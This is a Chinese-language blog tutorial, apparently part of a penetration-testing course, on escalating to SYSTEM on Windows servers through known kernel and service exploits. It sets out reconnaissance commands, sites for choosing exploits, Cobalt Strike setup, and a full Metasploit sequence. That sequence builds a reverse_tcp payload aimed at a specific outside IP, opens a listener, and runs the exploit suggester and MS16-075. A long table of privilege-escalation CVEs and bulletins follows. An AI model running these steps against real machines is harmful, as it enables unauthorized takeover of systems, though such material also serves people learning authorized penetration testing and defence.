第98天：权限提升-WIN全平台&MSF自动化&CS插件化&EXP筛选&溢出漏洞

最新推荐文章于 2025-02-04 09:10:11 发布

Ch4ser

最新推荐文章于 2025-02-04 09:10:11 发布

阅读量620

点赞数 1

分类专栏：权限提升文章标签：自动化网络安全

本文链接：https://blog.csdn.net/qq_46081990/article/details/131168017

版权

权限提升专栏收录该内容

10 篇文章

订阅专栏

本文详细介绍了WIN系统中通过溢出漏洞进行权限提升的技术，包括信息收集、EXP筛选与利用、不同环境下的提权方法。提权步骤涵盖从Web权限到系统和域控权限的提升，涉及多种工具和资源，以及常见的漏洞利用案例。文章还列举了多个CVE编号的主流提权漏洞。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

在这里插入图片描述

知识点梳理

#知识点：
1、掌握WIN系统溢出漏洞提权用户权限
2、掌握WIN系统溢出漏洞提权常用命令
3、掌握WIN系统溢出漏洞提权常见步骤
4、掌握WIN系统溢出漏洞提权EXP筛选&利用
5、掌握WIN系统溢出漏洞提权不同环境利用区别

#章节点：
1、Web权限提升
2、系统权限提升
3、域控权限提升

#详细点：
1、具体有哪些权限需要我们了解掌握的？
后台权限，网站权限，数据库权限，接口权限，系统权限，域控权限等

2、以上常见权限获取方法简要归类说明？
后台权限：SQL注入,数据库备份泄露，默认或弱口令等获取帐号密码进入
网站权限：后台提升至网站权限，RCE或文件操作类、反序列化等漏洞直达Shell
数据库权限：SQL注入,数据库备份泄露，默认或弱口令等进入或网站权限获取后转入
接口权限：SQL注入,数据库备份泄露，源码泄漏，培植不当等或网站权限获取后转入
系统权限：高危系统漏洞直达或网站权限提升转入、数据库权限提升转入，第三方转入等
域控权限：高危系统漏洞直达或内网横向渗透转入，域控其他服务安全转入等

3、以上常见权限获取后能操作的具体事情?
后台权限:
常规WEB界面文章分类等操作，后台功能可操作类
网站权限：
查看或修改程序源代码，可以进行网站或应用的配置文件读取（接口配置信息，数据库配置信息等），还能收集服务器操作系统相关的信息，为后续系统提权做准备。
数据库权限：
操作数据库的权限，数据库的增删改等，源码或配置文件泄漏，也可能是网站权限(webshell)进行的数据库配置文件读取获得。也可以作为提升系统权限手段。
接口权限：
后台或网站权限后的获取途径：后台（修改配置信息功能点），网站权限（查看的配置文件获取），具体可以操作的事情大家自己想想。
系统权限：如同在你自己操作自己的电脑一样
域控权限：如同在你自己操作自己的虚拟机一样

手工提权常见步骤（溢出漏洞）

1、信息收集
操作系统版本、漏洞补丁、位数、杀软防护、网络、当前权限等信息
ver、systeminfo、whoami、netstat -ano、tasklist /svc等

2、基于以上信息筛选可用的溢出漏洞的EXP
手工筛选EXP
使用WindowsVulnScan筛选EXP
使用在线提权网站筛选 https://i.hacking8.com/tiquan

3、上传EXP调用执行去提权
基于手工的操作
基于CS的半自动提权
基于MSF的全自动提权

演示案例

Web&Win2008-人工手动-筛选&下载&利用

Web&Win2008-CS半自动-反弹&插件&利用

Web&Win2012-MSF全自动-筛选&探针&利用

Web&Win2016&2019-Ladon半自动-上传利用

#Web&Windows-人工手动-筛选&下载&利用
如果提权中无法执行命令的话，可以尝试上传cmd.exe到可读写目录再调用执行
1、脚本项目筛选：补丁&系统&漏洞等
https://github.com/vulmon/Vulmap
https://github.com/bitsadmin/wesng
https://github.com/chroblert/WindowsVulnScan
1.1、网站平台筛选：补丁&系统&漏洞等
https://i.hacking8.com/tiquan
2、漏洞EXP下载执行：
https://github.com/k8gege/Ladon
https://github.com/Ascotbe/KernelHub
https://github.com/nomi-sec/PoC-in-GitHub
https://github.com/offensive-security/exploitdb
http://cve.mitre.org/data/refs/refmap/source-MS.html
说明：通过对应补丁漏洞编号寻可利用EXP
MS&CVE 关系区别&对应反查
KernelHub 针对常用溢出编号指定找EXP
Poc-in-Github 针对年份及编号指定找EXP
exploitdb 针对类型及关键说明指定找EXP
3、上传EXP调用执行

#Web&Windows-CS半自动-反弹&插件&利用
1、配置启动
服务器启动服务端：
chmod +x teamserver
./teamserver IP password
客户端连接服务端：
运行cobaltstrike.bat（运行不起来请检测JDK版本）
2、配置监听器生成后执行
3、选择提权模块调用执行

#Web&Windows-MSF全自动-筛选&探针&利用
1、生成反弹后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=106.14.195.29 LPORT=3333 -f exe -o msf.exe
2、配置监听会话
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
exploit
background（反弹后）
2.1、筛选EXP模块
use post/windows/gather/enum_patches（半自动：根据漏洞编号找出系统中安装的补丁）
use post/multi/recon/local_exploit_suggester（全自动：快速识别系统中可能被利用的漏洞）
show options
set session 1
set showdescription true
exploit
3、利用EXP溢出提权
use exploit/windows/local/ms16_075_reflection_juicy
set session 1
exploit

#Web&Win16&19-Ladon半自动-上传&插件&利用
https://github.com/k8gege/Ladon
ladon40 badpotato whoami



#截止2022年前的主流提权漏洞：
CVE-2021-33739 [Microsoft DWM 核心库特权提升漏洞]（Windows 10、20）
CVE-2021-1732 [Windows Win32k 提权漏洞] (Windows 10, 2019/20H2)
CVE-2020-0787【Windows后台智能传输服务提权漏洞】（Windows 7/8/10、2008/2012/2016/2019）
CVE-2020-0796 [Microsoft 服务器消息块 3.1.1 (SMBv3) 协议处理某些请求的方式中存在一个远程代码执行漏洞，即“Windows SMBv3 客户端/服务器远程代码执行漏洞”] (Windows 1903/1909 )
CVE-2019-1458 [当Win32k组件无法正确处理内存中的对象时，Windows中存在一个特权提升漏洞]（Windows 7/8/10/2008/2012/2016）
CVE-2019-0803 [Win32k 组件无法正确处理内存中的对象时，Windows 中存在提权漏洞] (Windows 7/8/10/2008/2012/2016/2019)
CVE-2018-8639 [Win32k 组件无法正确处理内存中的对象时，Windows 中存在提权漏洞] (Windows 7/8/10/2008/2012/2016)
CVE-2018-1038 [Windows 内核提权漏洞]（Windows 7 SP1/Windows Server 2008 R2 SP1）
CVE-2018-0743 [Windows Subsystem for Linux Elevation of Privilege Vulnerability]（Windows 10 版本 1703/Windows 10 版本 1709/Windows Server 版本 1709）
CVE-2018-8453 [Windows Win32k 组件中的提权漏洞] (>= windows 8.1)
CVE-2018-8440 [Windows ALPC 提权漏洞] (windows 7/8.1/10/2008/2012/2016)
MS17-017 　[KB4013081] [GDI 调色板对象本地权限提升]（Windows 7/8）
CVE-2017-8464 　[LNK远程执行代码漏洞]（Windows 10 / 8.1 / 7/2016/2010/2008）
CVE-2017-0213 　[Windows COM 提权漏洞] (windows 10/8.1/7/2016/2010/2008)
CVE-2018-0833 [SMBv3 空指针取消引用拒绝服务] (Windows 8.1/Server 2012 R2)
CVE-2018-8120 [Win32k 提权漏洞] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
MS17-010 　[KB4013389] [Windows 内核模式驱动程序] (windows 7/2008/2003/XP)
MS16-135 　[KB3199135] [Windows 内核模式驱动程序] (2016)
MS16-111 　[KB3186973] [内核 API] (Windows 10 10586 (32/64)/8.1)
MS16-098 　[KB3178466] [内核驱动程序] (Win 8.1)
MS16-075 　[KB3164038] [热土豆] (2003/2008/7/8/2012)
MS16-034 　[KB3143145] [内核驱动程序] (2008/7/8/10/2012)
MS16-032 　[KB3143141] [辅助登录句柄] (2008/7/8/10/2012)
MS16-016 　[KB3136041] [WebDAV] (2008/Vista/7)
MS16-014 　[K3134228] [远程代码执行] (2008/Vista/7)
MS15-097 　[KB3089656] [远程代码执行] (win8.1/2012)
MS15-076 　[KB3067505] [RPC] (2003/2008/7/8/2012)
MS15-077 　[KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012)
MS15-061 　[KB3057839] [内核驱动程序] (2003/2008/7/8/2012)
MS15-051 　[KB3057191] [Windows内核模式驱动程序]（2003/2008/7/8/2012）
MS15-015 　[KB3031432] [内核驱动程序] (Win7/8/8.1/2012/RT/2012 R2/2008 R2)
MS15-010 　[KB3036220] [内核驱动程序] (2003/2008/7/8)
MS15-001 　[KB3023266] [内核驱动程序] (2008/2012/7/8)
MS14-070 　[KB2989935] [内核驱动程序] (2003)
MS14-068 　[KB3011780] [域权限提升] (2003/2008/2012/7/8)
MS14-058 　[KB3000061] [Win32k.sys] (2003/2008/2012/7/8)
MS14-066 　[KB2992611] [Windows Schannel 允许远程代码执行] (VistaSP2/7 SP1/8/Windows 8.1/2003 SP2/2008 SP2/2008 R2 SP1/2012/2012 R2/Windows RT/Windows RT 8.1)
MS14-040 　[KB2975684] [AFD 驱动程序] (2003/2008/2012/7/8)
MS14-002 　[KB2914368] [NDProxy] (2003/XP)
MS13-053 　[KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7)
MS13-046 　[KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7)
MS13-005 　[KB2778930] [内核模式驱动程序] (2003/2008/2012/win7/8)
MS12-042 　[KB2972621] [服务总线] (2008/2012/win7)
MS12-020 　[KB2671387] [RDP] (2003/2008/7/XP)
MS11-080 　[KB2592799] [AFD.sys] (2003/XP)
MS11-062 　[KB2566454] [NDISTAPI] (2003/XP)
MS11-046 　[KB2503665] [AFD.sys] (2003/2008/7/XP)
MS11-011 　[KB2393802] [内核驱动程序] (2003/2008/7/XP/Vista)
MS10-092 　[KB2305420] [任务计划程序] (2008/7)
MS10-065 　[KB2267960] [FastCGI]（IIS 5.1、6.0、7.0 和 7.5）
MS10-059 　[KB982799] [ACL-Churraskito] (2008/7/Vista)
MS10-048 　[KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
MS10-015 　[KB977165] [KiTrap0D] (2003/2008/7/XP)
MS10-012 　[KB971468] [SMB 客户端 Trans2 堆栈溢出] (Windows 7/2008R2)
MS09-050 　[KB975517] [远程代码执行] (2008/Vista)
MS09-020 　[KB970483] [IIS 6.0]（IIS 5.1 和 6.0）
MS09-012 　[KB959454] [Chimichurri] (Vista/win7/2008/Vista)
MS08-068 　[KB957097] [远程代码执行] (2000/XP)
MS08-067 　[KB958644] [远程代码执行] (Windows 2000/XP/Server 2003/Vista/Server 2008)
MS08-066 　[KB956803] [AFD.sys] (Windows 2000/XP/Server 2003)
MS08-025 　[KB941693] [Win32.sys] (XP/2003/2008/Vista)
MS06-040 　[KB921883] [远程代码执行] (2003/xp/2000)
MS05-039 　[KB899588] [PnP 服务] (Win 9X/ME/NT/2000/XP/2003)
MS03-026 　[KB823980] [RPC接口中的缓冲区溢出]（/ NT / 2000 / XP / 2003）